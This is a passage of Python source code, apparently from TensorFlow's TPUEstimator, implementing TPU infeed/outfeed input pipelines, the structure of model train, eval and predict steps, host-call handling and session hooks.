# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
inputs = _Inputs.from_input_fn(input_fn())
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
# TODO(ylc): Refactoring the code to merge the tpu ordinal logic here and the
# _TPUContext.tpu_ordinal_function. We should either introduce another
# abstraction or a different helper method.
def _tpu_ordinal_function_impl(shard_index_in_host):
# We put both enqueue/dequeue op at tpu.core(0) in each replica.
replica = ctx.device_assignment.lookup_replicas(
host_id, (0, 0, 0))[shard_index_in_host]
return ctx.device_assignment.tpu_ordinal(replica=replica)
if ctx.model_parallelism_enabled:
tpu_ordinal_function = _tpu_ordinal_function_impl
else:
tpu_ordinal_function = None
def enqueue_ops_fn():
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels, signals)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
del host_id # unused
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
# TODO(b/XXX): Add predict support for PER_HOST_V2
raise TypeError('Most PREDICT not yet supported in PER_HOST_V2 mode.')
hooks.append(inputs.dataset_initializer_hook())
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in `_TPUContext`, it
invokes `input_fn` for all cores (usually multi-host TPU training) or for one
host (usually for single-host TPU evaluation), and sends all `features` and
`labels` returned by `input_fn` to TPU infeed. For per-core invocation,
`features` and `labels` are piped to infeed directly, one tuple for each
core. For per-host invocation, `features` and `labels` are split at host
(with respect to `batch_axis`) and piped to all cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
TPU infeed/outfeed library expects flattened tensor list. So, `features` and
`labels` need to be flattened, before infeed enqueue, and the structure of
them needs to be recorded, in order to restore them after infeed dequeue.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self):
# Holds the structure of inputs
self._feature_names = []
self._label_names = []
self._has_labels = False
self._signals_helper = None
# Internal state.
self._initialized = False
def has_labels(self):
return self._has_labels
def validate_and_record_structure(self, features, labels, signals=None):
"""Validates and records the structure of features` and `labels`."""
def _extract_key_names(tensor_or_dict):
if tensor_or_dict is None:
return []
return sorted(tensor_or_dict.keys()) if isinstance(
tensor_or_dict, dict) else []
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if signals is not None and self._signals_helper is None:
# Record signals helper.
self._signals_helper = _SignalsHelper(signals)
if self._initialized:
# Verify the structure is same. The following should never happen.
assert feature_names == self._feature_names, 'feature keys mismatched'
assert label_names == self._label_names, 'label keys mismatched'
assert has_labels == self._has_labels, 'label presence mismatched'
else:
# Record structure.
self._initialized = True
self._feature_names = feature_names
self._label_names = label_names
self._has_labels = has_labels
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
flattened_inputs = []
if self._feature_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend(
[features[name] for name in self._feature_names])
else:
flattened_inputs.append(features)
if labels is not None:
if self._label_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend([labels[name] for name in self._label_names])
else:
flattened_inputs.append(labels)
if signals is not None:
flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
return flattened_inputs
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
expected_num_features = (
len(self._feature_names) if self._feature_names else 1)
if self._has_labels:
expected_num_labels = (
len(self._label_names) if self._label_names else 1)
else:
expected_num_labels = 0
expected_num_signals = (
self._signals_helper.num_signals if self._signals_helper else 0)
expected_num_tensors = (
expected_num_features + expected_num_labels + expected_num_signals)
if expected_num_tensors != len(flattened_inputs):
raise ValueError(
'The number of flattened tensors mismatches expected num. '
'Expected {}, got {}'.format(expected_num_tensors,
len(flattened_inputs)))
if self._feature_names:
unflattened_features = dict(
zip(self._feature_names, flattened_inputs[:expected_num_features]))
else:
# Single tensor case
unflattened_features = flattened_inputs[0]
if expected_num_labels == 0:
unflattened_label = None
elif self._label_names:
label_list = flattened_inputs[
expected_num_features:expected_num_features + expected_num_labels]
unflattened_label = dict(zip(self._label_names, label_list))
else:
# Single tensor case.
unflattened_label = flattened_inputs[expected_num_features]
signals = None
if expected_num_signals != 0:
tensor_list_for_signals = flattened_inputs[
expected_num_features + expected_num_labels:]
signals = self._signals_helper.unflatten(tensor_list_for_signals)
return _Inputs(unflattened_features, unflattened_label, signals=signals)
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_TPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
# Perform some sanity checks to log user friendly information. We should
# error out to give users better error message. But, if
# _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
# user code, so, log a warning.
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/programmers_guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, TPUEstimatorSpec):
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, TPUEstimatorSpec) and
estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return train_step, host_call, captured_scaffold_fn
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
identity_fn = lambda **kwargs: kwargs
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(tpu_estimator_spec.predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return predict_step, host_calls, captured_scaffold_fn
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
model_fn_args = util.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
if isinstance(params, hparam.HParams):
params.add_hparam(_BATCH_SIZE_KEY, batch_size_for_model_fn)
else:
params[_BATCH_SIZE_KEY] = batch_size_for_model_fn
estimator_spec = self._model_fn(features=features, **kwargs)
if (self._ctx.is_running_on_cpu(is_export_mode) and
isinstance(estimator_spec, TPUEstimatorSpec)):
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, TPUEstimatorSpec):
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(err_msg.format('training_chief_hooks'))
if estimator_spec.training_hooks:
raise ValueError(err_msg.format('training_hooks'))
if estimator_spec.evaluation_hooks:
raise ValueError(err_msg.format('evaluation_hooks'))
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = util.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return []
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
tpu_device_placement_fn = self._ctx.tpu_device_placement_function
for i in xrange(self._ctx.num_replicas):
with ops.device(tpu_device_placement_fn(i)):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Count examples during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
examples_per_sec = self._batch_size * elapsed_steps / elapsed_time
if self._summary_writer is not None:
example_summary = Summary(value=[
Summary.Value(tag='examples_sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(example_summary, global_step)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
